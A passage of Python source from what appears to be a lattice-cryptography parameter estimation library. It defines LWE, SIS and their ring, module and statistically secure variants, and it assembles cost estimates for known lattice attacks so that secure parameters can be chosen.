        algs = []

        def append_alg(algname, cname, algf, prio, cprio):
            # Collect one entry in the common algorithm-dict format.
            algs.append(
                {
                    "algname": algname,
                    "cname": cname,
                    "algf": algf,
                    "prio": prio,
                    "cprio": cprio,
                    "inst": self.variant,
                }
            )

        # Properties of the secret distribution decide which attack variants apply.
        sparse = est.SDis.is_sparse(secret_distribution)
        ternary = est.SDis.is_ternary(secret_distribution)
        small = est.SDis.is_small(secret_distribution)

        # Choose algorithms. Similar to estimate_lwe function in estimator.py
        for reduction_cost_model in cost_models:
            cost_model = reduction_cost_model["cost_model"]
            success_probability = reduction_cost_model["success_probability"]
            cname = reduction_cost_model["name"]
            cprio = reduction_cost_model["prio"]

            # Keyword arguments shared by every estimator call below.
            base_kwargs = dict(
                n=self.n,
                alpha=alpha,
                q=self.q,
                m=self.m,
                secret_distribution=secret_distribution,
                success_probability=success_probability,
            )

            if "usvp" in config.algorithms:
                if sparse and ternary:
                    # Try guessing secret entries via drop_and_solve
                    append_alg(
                        "primal-usvp-drop",
                        cname,
                        partial(
                            est.drop_and_solve,
                            est.primal_usvp,
                            postprocess=False,
                            decision=False,
                            rotations=False,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        10,
                        cprio,
                    )
                else:  # TODO: can drop and solve yield worse results than standard decode?
                    append_alg(
                        "primal-usvp",
                        cname,
                        partial(
                            est.primal_usvp,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        10,
                        cprio,
                    )

            if "dual" in config.algorithms:
                if ternary:  # TODO can drop and solve yield worse results than standard?
                    # Try guessing secret entries via drop_and_solve
                    append_alg(
                        "dual-scale-drop",
                        cname,
                        partial(
                            est.drop_and_solve,
                            est.dual_scale,
                            postprocess=True,
                            rotations=False,
                            use_lll=True,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        20,
                        cprio,
                    )
                elif small:
                    append_alg(
                        "dual-scale",
                        cname,
                        partial(
                            est.dual_scale,
                            use_lll=True,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        20,
                        cprio,
                    )
                else:
                    append_alg(
                        "dual",
                        cname,
                        partial(
                            est.dual,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        20,
                        cprio,
                    )

            if "dual-without-lll" in config.algorithms:
                if ternary:  # TODO can drop and solve yield worse results than standard?
                    # Try guessing secret entries via drop_and_solve
                    append_alg(
                        "dual-scale-drop-without-lll",
                        cname,
                        partial(
                            est.drop_and_solve,
                            est.dual_scale,
                            postprocess=True,
                            rotations=False,
                            use_lll=False,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        30,
                        cprio,
                    )
                elif small:
                    append_alg(
                        "dual-scale-without-lll",
                        cname,
                        partial(
                            est.dual_scale,
                            use_lll=False,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        30,
                        cprio,
                    )
                elif "dual" not in config.algorithms:
                    # guarded so the plain dual attack is not run twice
                    append_alg(
                        "dual-without-lll",
                        cname,
                        partial(
                            est.dual,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        30,
                        cprio,
                    )

            if "decode" in config.algorithms:
                # TODO: Runtime much worse than primal-usvp, may yield better values for small n (Regev scheme n < 256?)
                # TODO: Could be used when early termination is on perhaps, then it would only be called when all other tests succeed?
                if sparse and ternary:
                    append_alg(
                        "primal-decode-drop",
                        cname,
                        partial(
                            est.drop_and_solve,
                            est.primal_decode,
                            postprocess=False,
                            decision=False,
                            rotations=False,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        100,
                        cprio,
                    )
                else:  # TODO: can drop and solve yield worse results than standard decode?
                    append_alg(
                        "primal-decode",
                        cname,
                        partial(
                            est.primal_decode,
                            reduction_cost_model=cost_model,
                            **base_kwargs,
                        ),
                        100,
                        cprio,
                    )

        # attacks without reduction cost model
        # NOTE(review): ``base_kwargs`` (and hence ``success_probability``) is
        # reused from the *last* iteration of the loop above; if ``cost_models``
        # is empty this raises NameError. Preserved from the original code —
        # confirm this is intended.
        if "mitm" in config.algorithms:
            # estimates are very bad but very fast, so no need to exclude
            append_alg("mitm", "", partial(est.mitm, **base_kwargs), 5, 5)

        if "coded-bkw" in config.algorithms:
            # sometimes slow but may yield good results
            append_alg("coded-bkw", "", partial(est.bkw_coded, **base_kwargs), 90, 0)

        if "arora-gb" in config.algorithms:  # slow and bad results
            if sparse and small:
                append_alg(
                    "arora-gb-drop",
                    "",
                    partial(
                        est.drop_and_solve,
                        est.arora_gb,
                        rotations=False,
                        **base_kwargs,
                    ),
                    200,
                    0,
                )
            elif secret_distribution != "normal" and small:
                # switch_modulus does not work for normal sec_dis
                append_alg(
                    "arora-gb-switch-modulus",
                    "",
                    partial(est.switch_modulus, est.arora_gb, **base_kwargs),
                    200,
                    0,
                )
            else:
                append_alg(
                    "arora-gb", "", partial(est.arora_gb, **base_kwargs), 200, 0
                )

        return algs

    def to_LWE(self):
        """
        :returns: self (an LWE instance is already unstructured)
        """
        return self

    def __str__(self):
        # TODO
        return f"LWE [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, sec_dis={str(self.secret_distribution._convert_for_lwe_estimator())}, err_dis={str(float(self.error_distribution.get_alpha(q=self.q, n=self.n)))}]"
class MLWE(LWE):
    """
    Module Learning with Errors (MLWE) problem class used to create a list of algorithms from LWE Estimator :cite:`APS15` for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("MLWE1", ...).
    _counter = 1

    def __init__(
        self,
        n,
        d,
        q,
        m,
        secret_distribution: distributions.Distribution,
        error_distribution: distributions.Distribution,
        label=None,
        variant="MLWE",
    ):
        """
        :param n: degree of ring polynomial
        :param d: rank of module
        :param q: modulus
        :param m: number of samples
        :param secret_distribution: secret distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param error_distribution: error distribution (instance of subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not d or not q or not m or n < 0 or d < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance, so the counter is
            # shared by all MLWE instances and labels stay unique.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        self.n = n
        self.d = d
        self.q = q
        self.m = m
        self.secret_distribution = secret_distribution
        self.error_distribution = error_distribution

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions on the MLWE instance according to the attack configuration.

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "MLWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime)
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")
        # Delegate to the equivalent unstructured LWE instance.
        return self.to_LWE().get_estimate_algorithms(config=config)

    def to_LWE(self):
        r"""
        :returns: LWE instance with parameters :math:`n=n \cdot d` and :math:`m=m \cdot n`
        """
        return LWE(
            n=self.n * self.d,
            q=self.q,
            m=self.m * self.n,
            secret_distribution=self.secret_distribution,
            error_distribution=self.error_distribution,
            variant="MLWE",
            label=self.label,
        )

    def __str__(self):
        # f-string form produces the same text as the original concatenation
        return (
            f"MLWE instance with parameters (n={self.n}, d={self.d}, q={self.q}, m={self.m}"
            f", secret_distribution={self.secret_distribution._convert_for_lwe_estimator()}"
            f", error_distribution={self.error_distribution._convert_for_lwe_estimator()})"
        )
class RLWE(LWE):
    """
    Ring Learning with Errors (RLWE) problem class used to create a list of algorithms from LWE Estimator :cite:`APS15` for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("RLWE1", ...).
    _counter = 1

    def __init__(
        self,
        n,
        q,
        m,
        secret_distribution: distributions.Distribution,
        error_distribution: distributions.Distribution,
        variant="RLWE",
        label=None,
    ):
        """
        :param n: degree of ring polynomial
        :param q: modulus
        :param m: number of samples
        :param secret_distribution: secret distribution (subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param error_distribution: error distribution (subclass of :py:mod:`lattice_parameter_estimation.distributions.Gaussian` or :py:mod:`lattice_parameter_estimation.distributions.Uniform`)
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not q or not m or n < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance, so labels stay unique.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        ## interpret coefficients of elements of R_q as vectors in Z_q^n [ACD+18, p. 6] TODO: check
        self.n = n
        self.q = q
        self.m = m
        self.secret_distribution = secret_distribution
        self.error_distribution = error_distribution

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions on the RLWE instance according to the attack configuration by interpreting the coefficients of elements of :math:`\mathcal{R}_q` as vectors in :math:`\mathbb{Z}_q^n` as in :cite:`ACDDPPVW18`, p. 6.

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "RLWE"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime)
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")
        # Delegate to the equivalent unstructured LWE instance.
        return self.to_LWE().get_estimate_algorithms(config=config)

    def to_LWE(self):
        r"""
        :returns: LWE instance with parameters :math:`n=n` and :math:`m=m \cdot n`
        """
        return LWE(
            n=self.n,
            q=self.q,
            m=self.m * self.n,
            secret_distribution=self.secret_distribution,
            error_distribution=self.error_distribution,
            variant="RLWE",
            label=self.label,
        )

    def __str__(self):
        # f-string form produces the same text as the original concatenation
        return (
            f"RLWE instance with parameters (n={self.n}, q={self.q}, m={self.m}"
            f", secret_distribution={self.secret_distribution._convert_for_lwe_estimator()}"
            f", error_distribution={self.error_distribution._convert_for_lwe_estimator()})"
        )
class StatisticalGaussianMLWE:
    r"""
    Statistically secure MLWE over Gaussian distribution according to :cite:`LPR13`.

    Mapping of parameters in paper to use here:

    ============================= =========== ========================================
    Parameters in :cite:`LPR13`   Use Here    Represents
    ============================= =========== ========================================
    :math:`q`                     :math:`q`   modulus
    :math:`l`                     :math:`m+d` width of matrix :math:`\mathbf{A}`
    :math:`k`                     :math:`m`   height of matrix :math:`\mathbf{A}`
    :math:`n`                     :math:`n`   degree of ring polynomial
    ============================= =========== ========================================

    Then Corollary 7.5 combined with Theorem 7.4 in :cite:`LPR13` reads as follows:

    Let :math:`\mathcal{R}` be the ring of integers in the :math:`m'`th cyclotomic number field :math:`K` of degree :math:`n`, and :math:`q \geq 2` an integer.
    For positive integers :math:`m \leq m + d \leq \text{poly}(n)`, let :math:`\mathbf{A} = [ \mathbf{I}_{[m]} \mid \bar{\mathbf{A}}] \in (\mathcal{R}_q)^{[m] \times [m+d]}`, where :math:`\mathbf{I}_{[m]} \in (\mathcal{R}_q)^{[m] \times [m]}` is the identity matrix and :math:`\bar{\mathbf{A}} \in (\mathcal{R}_q)^{[m] \times [d]}` is uniformly random.
    Then with probability :math:`1 - 2^{-\Omega(n)}` over the choice of :math:`\bar{\mathbf{A}}`, the distribution of :math:`\mathbf{A}\mathbf{x} \in (\mathcal{R}_q)^{[m]}` where each coordinate of :math:`\mathbf{x} \in (\mathcal{R}_q)^{[m+d]}` is chosen from a discrete Gaussian distribution of parameter :math:`s > 2n \cdot q^{m / (m+d) + 2/(n (m+d))}` over :math:`\mathcal{R}`, satisfies that the probability of each of the :math:`q^{n m}` possible outcomes is in the interval :math:`(1 \pm 2^{-\Omega(n)}) q^{-n }` (and in particular is within statistical distance :math:`2^{-\Omega(n)}` of the uniform distribution over :math:`(\mathcal{R}_q)^{[m]}`).

    :ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
    :ivar sec: set to parameter sec if sec is specified in constructor, else set to n
    """

    def __init__(self, n, d, q, m, sec=None):
        """
        :param n: degree of ring polynomial
        :param d: rank of module
        :param q: modulus
        :param m: number of samples
        :param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
        """
        # TODO check parameters
        if sec and sec > n:
            # Statistical security is only guaranteed when n >= sec, so reject
            # the opposite case. (Original message had the inequality inverted.)
            raise ValueError(
                "sec parameter must not be greater than degree of ring polynomial n. Given parameters are not statistically secure."
            )
        self.n = n
        self.d = d
        self.q = q
        self.m = m
        # Minimum Gaussian width parameter s > 2n * q^(m/(m+d) + 2/(n(m+d)))
        # from Theorem 7.4 / Corollary 7.5 in [LPR13], converted to a stddev.
        min_s = RR(2 * n * q ** (m / (m + d) + 2 / (n * (m + d))))
        self.min_sigma = est.stddevf(min_s)
        # we choose sec, not n, as we possibly need it for Gaussian to bound conversion
        self.sec = sec if sec else n

    def get_secret_distribution_min_width(self):
        # TODO: do the same in StatisticalMSIS
        return distributions.GaussianSigma(
            self.min_sigma, q=self.q, componentwise=True, sec=self.sec
        )
class StatisticalGaussianMatrixMLWE(StatisticalGaussianMLWE):
    r"""
    Statistically secure MLWE over Gaussian distribution according to :cite:`LPR13`, parametrized by matrix dimensions.

    For more details, see :class:`StatisticalGaussianMLWE`.

    :ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
    :ivar sec: set to parameter sec if sec is specified in constructor, else set to n
    """

    def __init__(self, n, q, width, height, sec=None):
        r"""
        :param n: degree of ring polynomial
        :param q: modulus
        :param width: width of matrix :math:`\mathbf{A}`
        :param height: height of matrix :math:`\mathbf{A}`
        :param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
        """
        # A width x height matrix corresponds to m = height samples over a
        # module of rank d = width - height.
        module_rank = width - height
        super().__init__(n=n, d=module_rank, q=q, m=height, sec=sec)
class StatisticalGaussianRLWE(StatisticalGaussianMLWE):
    r"""
    Statistically secure RLWE over Gaussian distribution with invertible elements :cite:`LPR13`.

    For details, see :class:`StatisticalGaussianMLWE` with module dimension :math:`d=1`.

    :ivar min_sigma: minimum :math:`\sigma` (standard deviation) required for statistically secure MLWE
    :ivar sec: set to parameter sec if sec is specified in constructor, else set to n
    """

    def __init__(self, n, q, m, sec=None):
        """
        :param n: degree of ring polynomial
        :param q: modulus
        :param m: number of samples
        :param sec: optional security parameter to ensure that n >= sec and for Gaussian conversion
        """
        # RLWE is the rank-1 special case of MLWE.
        super().__init__(n=n, d=1, q=q, m=m, sec=sec)
class StatisticalUniformMLWE:
    r"""
    Statistically secure MLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.

    MLWE problem instance where samples :math:`(\mathbf{A}', h_{\mathbf{A}'}(y))` are within statistical distance :math:`2^{-\texttt{sec}}` of :math:`(\mathbf{A}', \mathbf{u})` for uniform :math:`\mathbf{u}`.

    Mapping of parameters in paper to use here:

    ============================= =========== ============================================================
    Parameters in :cite:`BDLOP18` Use Here    Represents
    ============================= =========== ============================================================
    :math:`q`                     :math:`q`   modulus
    :math:`k`                     :math:`m+d` width of matrix :math:`[ \mathbf{I}_n \; \mathbf{A}' ]`
    :math:`n`                     :math:`m`   height of matrix :math:`[ \mathbf{I}_n \; \mathbf{A}' ]`
    :math:`d`                     :math:`d_2` variable
    :math:`N`                     :math:`n`   degree of ring polynomial
    ============================= =========== ============================================================

    Lemma (:cite:`BDLOP18` Lemma 4): Let :math:`1 < d_2 < n` be a power of 2. If :math:`q` is a prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)` and

    .. math::
        q^{m/(m+d)} \cdot 2^{2 \texttt{sec}/((m+d)\cdot n)} \leq 2 \beta < \frac{1}{\sqrt{d_2}} \cdot q^{1/d_2}

    then any (all-powerful) algorithm :math:`\mathcal{A}` has advantage at most :math:`2^{-\texttt{sec}}` in solving :math:`\text{DKS}_{m,m+d,\beta}^\infty`, where :math:`\text{DKS}^\infty` is the decisional knapsack problem in :math:`\ell_\infty`-norm.

    Hence, we have:

    .. math::
        \beta_{min} = \frac{q^{m/(m+d)} \cdot 2^{2 \texttt{sec}/((m+d)\cdot n)}}{2}

        \beta_{max} = \frac{1}{2\sqrt{d_2}} \cdot q^{1/d_2} - 1

    :ivar min_beta: :math:`\beta_{min}`, instance of :py:mod:`lattice_parameter_estimation.norm.Lp` with `p=oo`
    :ivar max_beta: :math:`\beta_{max}` , instance of :py:mod:`lattice_parameter_estimation.norm.Lp` with `p=oo`
    """

    def __init__(self, sec, n, d, q, m, d_2=None):
        r"""
        :param sec: required bit security of MLWE instance
        :param n: degree of ring polynomial
        :param d: rank of module (width of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
        :param q: modulus, must be prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
        :param m: number of samples (height of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
        :param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
        """
        if d_2 is None:
            d_2 = StatisticalUniformMLWE.find_d(q, n)
        # TODO: check prerequisites?
        self.n = n
        self.q = q
        self.m = m
        self.d = d
        self.d_2 = d_2
        # beta bounds derived from Lemma 4 in [BDLOP18] (see class docstring)
        min_beta = RR(q ** (m / (m + d)) * 2 ** (2 * sec / ((m + d) * n)) / 2)
        max_beta = RR(1 / (2 * sqrt(d_2)) * q ** (1 / d_2)) - 1
        if min_beta >= max_beta:
            logger.warning(
                "Could not find (min_beta, max_beta) such that min_beta < max_beta."
            )
        self.min_beta = norm.Lp(min_beta, oo, n * d)
        self.max_beta = norm.Lp(max_beta, oo, n * d)

    def get_beta_bounds(self):
        """
        :returns: tuple (min_beta, max_beta), betas are instances of :py:mod:`lattice_parameter_estimation.norm.Lp`
        """
        return (self.min_beta, self.max_beta)

    @staticmethod
    def find_d(q, n):
        r"""
        Find :math:`d` that is a power of 2 and satisfies :math:`1 < d < n` such that the prime :math:`q` is congruent to :math:`2d + 1 \;(\text{mod } 4d)`.

        Declared as a static method so it also works when called on an instance
        (without the decorator, ``instance.find_d(q, n)`` would pass the
        instance as ``q``); class-level calls behave as before.

        :param q: prime
        :param n: upper bound of d (degree of ring polynomial)
        :raises ValueError: if no such d exists
        """
        d = 2
        while d < n:
            if (q % (4 * d)) == (2 * d + 1):
                return d
            d *= 2
        raise ValueError(
            "Could not find d such that 1 < d < n power of 2 and q congruent to 2d + 1 (mod 4d). q="
            + str(q)
            + ", n="
            + str(n)
            + ". Try again or call constructor with d_2."
        )
class StatisticalUniformMatrixMLWE(StatisticalUniformMLWE):
    r"""
    Statistically secure MLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.

    For more details, see :class:`StatisticalUniformMLWE`.

    :ivar min_beta: :math:`\beta_{min}`
    :ivar max_beta: :math:`\beta_{max}`
    """

    def __init__(self, sec, n, q, width, height, d_2=None):
        r"""
        :param sec: required bit security of MLWE instance
        :param n: degree of ring polynomial
        :param q: modulus, must be prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
        :param width: width of matrix :math:`\mathbf{A}`
        :param height: height of matrix :math:`\mathbf{A}`
        :param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
        """
        # A width x height matrix corresponds to m = height samples over a
        # module of rank d = width - height.
        super().__init__(n=n, sec=sec, q=q, d=width - height, m=height, d_2=d_2)
class StatisticalUniformRLWE(StatisticalUniformMLWE):
    r"""
    Statistically secure RLWE over Uniform distribution with invertible elements :cite:`BDLOP18`.

    For details, see :class:`StatisticalUniformMLWE` with module dimension :math:`d=1`.

    :ivar min_beta: :math:`\beta_{min}`
    :ivar max_beta: :math:`\beta_{max}`
    """

    def __init__(self, sec, n, q, m, d_2=None):
        r"""
        :param sec: required bit security of RLWE instance
        :param n: degree of ring polynomial
        :param q: modulus, must be prime congruent to :math:`2d_2 + 1 \;(\text{mod } 4d_2)`
        :param m: number of samples (height of matrix :math:`\mathbf{A}'` in :cite:`BDLOP18`)
        :param d_2: :math:`1 < d_2 < N` and :math:`d_2` is a power of 2
        """
        # RLWE is the rank-1 special case of MLWE.
        super().__init__(sec=sec, n=n, d=1, q=q, m=m, d_2=d_2)
## SIS and its variants ##
class SIS(BaseProblem):
    """
    Short Integer Solution (SIS) problem class used to create a list of algorithms from for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("SIS1", ...).
    _counter = 1

    def __init__(self, n, q, m, bound: norm.BaseNorm, variant="SIS", label=None):
        """
        :param q: modulus
        :param n: secret dimension
        :param m: number of samples
        :param bound: upper bound on norm of secret distribution, must be instance of subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`. TODO
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not q or not m or n < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance, so labels stay unique.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        self.q = q
        self.n = n
        self.m = m
        self.bound = bound

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions on the SIS instance according to the attack configuration.

        The priorities are assigned as follows:

        .. list-table:: Algorithm Priorities TODO
            :header-rows: 1

            * - Algorithm
              - Priority
              - Comment
            * - lattice-reduction
              - 1
              - fastest, low cost estimates
            * - lattice-reduction-rs
              - 2
              - same results as lattice-reduction
            * - combinatorial
              - 10
              - fast, often higher cost results
            * - combinatorial-conservative
              - 9
              - fast, often higher cost results, slightly better than combinatorial

        .. figure:: ../tests_for_optimization/algorithm_runtime_cost/SIS_plot_small.png
            :align: center
            :figclass: align-center

            SIS instance with :math:`n^2 < q < 2n^2, \; m = 2n \sqrt{n \log q}, \; s = 2 \sqrt{n \log q}`

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "SIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime)
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")

        cost_models = config.reduction_cost_models()
        algs = []

        def append_alg(algname, cname, algf, prio, cprio):
            # Collect one entry in the common algorithm-dict format.
            algs.append(
                {
                    "algname": algname,
                    "cname": cname,
                    "algf": algf,
                    "prio": prio,
                    "cprio": cprio,
                    "inst": self.variant,
                }
            )

        for reduction_cost_model in cost_models:
            cost_model = reduction_cost_model["cost_model"]
            cname = reduction_cost_model["name"]

            if "reduction-rs" in config.algorithms:
                # TODO: implement drop_and_solve and scale variants
                append_alg(
                    "lattice-reduction-rs",
                    cname,
                    partial(
                        algorithms.SIS.lattice_reduction_rs,
                        n=self.n,
                        beta=self.bound.to_L2(self.n).value,
                        q=self.q,
                        success_probability=reduction_cost_model[
                            "success_probability"
                        ],
                        m=self.m,
                        reduction_cost_model=cost_model,
                    ),
                    2,
                    reduction_cost_model["prio"],
                )

            if "reduction" in config.algorithms:
                append_alg(
                    "lattice-reduction",
                    cname,
                    partial(
                        algorithms.SIS.lattice_reduction,
                        n=self.n,
                        beta=self.bound.to_L2(self.n).value,
                        q=self.q,
                        success_probability=reduction_cost_model[
                            "success_probability"
                        ],
                        m=self.m,
                        reduction_cost_model=cost_model,
                    ),
                    1,
                    reduction_cost_model["prio"],
                )

            # NOTE(review): the two combinatorial branches below do not depend
            # on the cost model, yet they sit inside the cost-model loop, so an
            # identical entry is appended once per cost model. Behavior is
            # preserved from the original code — confirm whether they should be
            # moved outside the loop.
            if "combinatorial" in config.algorithms:
                append_alg(
                    "combinatorial",
                    "",
                    partial(
                        algorithms.SIS.combinatorial,
                        n=self.n,
                        q=self.q,
                        m=self.m,
                        bound=self.bound.to_Loo(self.n).value,
                    ),
                    10,
                    0,
                )

            if "combinatorial_conservative" in config.algorithms:
                append_alg(
                    "combinatorial-cons",
                    "",
                    partial(
                        algorithms.SIS.combinatorial_conservative,
                        n=self.n,
                        q=self.q,
                        m=self.m,
                        bound=self.bound.to_Loo(self.n).value,
                    ),
                    9,
                    0,
                )

        return algs

    def to_SIS(self):
        """
        :returns: self (a SIS instance is already unstructured)
        """
        return self

    def __str__(self):
        return f"SIS [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class MSIS(SIS):
    """
    Module Short Integer Solution (MSIS) problem class used to create a list of algorithms from for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("MSIS1", ...).
    _counter = 1

    def __init__(self, n, d, q, m, bound: norm.BaseNorm, variant="MSIS", label=None):
        """
        :param n: degree of ring polynomial
        :param d: rank of module
        :param q: modulus
        :param m: number of samples
        :param bound: upper bound on norm of solution, must be subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not d or not q or not m or n < 0 or d < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance, so labels stay unique.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        self.n = n
        self.d = d
        self.q = q
        self.m = m
        self.bound = bound

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions on the MSIS instance according to the attack configuration.

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "MSIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime)
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")
        # Delegate to the equivalent unstructured SIS instance.
        return self.to_SIS().get_estimate_algorithms(config=config)

    def to_SIS(self):
        r"""
        :returns: SIS instance with dimension :math:`n=n \cdot d` and :math:`m=m \cdot n`
        """
        return SIS(
            n=self.n * self.d,
            q=self.q,
            m=self.m * self.n,
            bound=self.bound,
            variant="MSIS",
            label=self.label,
        )

    def __str__(self):
        return f"MSIS [n={str(self.n)}, d={str(self.d)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class RSIS(SIS):
    """
    Ring Short Integer Solution (RSIS) problem class used to create a list of algorithms from for cost estimation.
    """

    # Class-level counter used to generate unique default labels ("RSIS1", ...).
    _counter = 1

    def __init__(self, n, q, m, bound: norm.BaseNorm, variant="RSIS", label=None):
        """
        :param q: modulus
        :param n: degree of ring polynomial
        :param m: number of samples
        :param bound: upper bound on norm of solution, must be subclass of :py:mod:`lattice_parameter_estimation.norm.BaseNorm`
        :param variant: for internal use to distinguish variants
        :param label: short string to refer to describe the problem name, e.g. ``"LWE-Regev"``
        """
        ## We interpret the coefficients of elements of R_q as vectors in Z_q^n [ACD+18, p. 6]
        # check soundness of parameters (rejects None, 0 and negative values)
        if not n or not q or not m or n < 0 or q < 0 or m < 0:
            raise ValueError("Parameters not specified correctly")
        if label is None:
            label = variant + str(self._counter)
            # Increment on the class, not the instance, so labels stay unique.
            type(self)._counter += 1
        self.label = label
        self.variant = variant
        self.n = n
        self.q = q
        self.m = m
        self.bound = bound

    def get_estimate_algorithms(self, config: algorithms.Configuration):
        r"""
        Compute list of estimate functions on a corresponding SIS instance according to the attack configuration by interpreting the coefficients of elements of :math:`\mathcal{R}_q` as vectors in :math:`\mathbb{Z}_q^n` as in :cite:`ACDDPPVW18`, p. 6.

        :param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
        :returns: list of algorithms, e.g. ``[{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "RSIS"}]`` where "prio" is the priority value of the algorithm (lower values have shorter estimated runtime)
        """
        if not isinstance(config, algorithms.Configuration):
            raise ValueError("config must be instance of algorithms.Configuration")
        # Delegate to the equivalent unstructured SIS instance.
        return self.to_SIS().get_estimate_algorithms(config=config)

    def to_SIS(self):
        r"""
        :returns: SIS instance with dimension :math:`n=n` and :math:`m=m \cdot n`
        """
        return SIS(
            n=self.n,
            q=self.q,
            m=self.m * self.n,
            bound=self.bound,
            variant="RSIS",
            label=self.label,
        )

    def __str__(self):
        return f"RSIS [n={str(self.n)}, q={str(self.q)}, m={str(self.m)}, bound ({type(self.bound).__name__})={str(float(self.bound.value))}]"
class StatisticalMSIS:
    r"""
    Statistically secure MSIS according to :cite:`DOTT21`, section 4.1.

    MSIS problem instance where the probability that non zero elements :math:`\mathbf{r}` in the Euclidean ball :math:`B_{m}(0, 2B)` satisfy :math:`\hat{\mathbf{A}}_1 \cdot \mathbf{r} = \mathbf{0}` is smaller than :math:`2^{-\texttt{sec}}`.

    Mapping of parameters in :cite:`DOTT21` to use here:

    ============================ ============= ============================================
    Parameters in :cite:`DOTT21` Use Here      Represents
    ============================ ============= ============================================
    :math:`m'`                   :math:`m+d`   width of matrix :math:`\hat{\mathbf{A}}_1`
    :math:`m`                    :math:`m`     height of matrix :math:`\hat{\mathbf{A}}_1`
    :math:`B`                    :math:`B`     norm-bound of secret
